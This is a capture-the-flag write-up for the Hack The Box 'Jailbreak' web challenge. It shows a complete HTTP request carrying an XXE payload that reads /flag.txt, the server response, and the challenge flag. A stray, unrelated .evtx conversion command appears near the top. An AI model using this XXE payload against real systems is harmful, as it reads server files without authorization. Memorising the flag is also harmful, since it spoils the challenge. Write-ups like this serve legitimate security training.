Jailbreak

May 18, 2024 · Hack The Box / Business CTF 2024 webxxelfi

find . -type f -name ‘*.evtx’ -exec sh -c ’evtx_dump.py “$0” > “$(basename “$0” .evtx).xml”’ {} ;

Challenge

CTF: HTB Business CTF 2024: The Vault of Hope
Name: Jailbreak
Category: Web
Difficulty: Very Easy
Points: 300
Description: The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. Using custom firmware and a series of precise modifications, can you bring the device to full operational status in order to pair it with the vault door’s access port. The flag is located in /flag.txt
Objective: XXE

Writeup

Website has a firmware update field at /rom. Its an XML form so XML External Entity (XXE) Attacks might be relevant to read a file…

web_jailbreak_1

Request:

POST /api/update HTTP/1.1
Host: 94.237.54.65:46621
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://94.237.54.65:46621/rom
Content-Type: application/xml
Content-Length: 1314
Origin: http://94.237.54.65:46621
Connection: keep-alive

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///flag.txt'>]><FirmwareUpdateConfig>
    <Firmware>
        <Version>&test;</Version>
        <ReleaseDate>2077-10-21</ReleaseDate>
        <Description>Update includes advanced biometric lock functionality for enhanced security.</Description>
        <Checksum type="SHA-256">9b74c9897bac770ffc029102a200c5de</Checksum>
    </Firmware>
    <Components>
        <Component name="navigation">
            <Version>3.7.2</Version>
            <Description>Updated GPS algorithms for improved wasteland navigation.</Description>
            <Checksum type="SHA-256">e4d909c290d0fb1ca068ffaddf22cbd0</Checksum>
        </Component>
        <Component name="communication">
            <Version>4.5.1</Version>
            <Description>Enhanced encryption for secure communication channels.</Description>
            <Checksum type="SHA-256">88d862aeb067278155c67a6d6c0f3729</Checksum>
        </Component>
        <Component name="biometric_security">
            <Version>2.0.5</Version>
            <Description>Introduces facial recognition and fingerprint scanning for access control.</Description>
            <Checksum type="SHA-256">abcdef1234567890abcdef1234567890</Checksum>
        </Component>
    </Components>
    <UpdateURL></UpdateURL>
</FirmwareUpdateConfig>

Response:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.3 Python/3.12.3
Date: Sat, 18 May 2024 16:05:17 GMT
Content-Type: application/json
Content-Length: 130
Connection: close

{
  "message": "Firmware version HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_30347106c112e3873dacb5b63263ab18} update initiated."
}

Flag: HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_30347106c112e3873dacb5b63263ab18}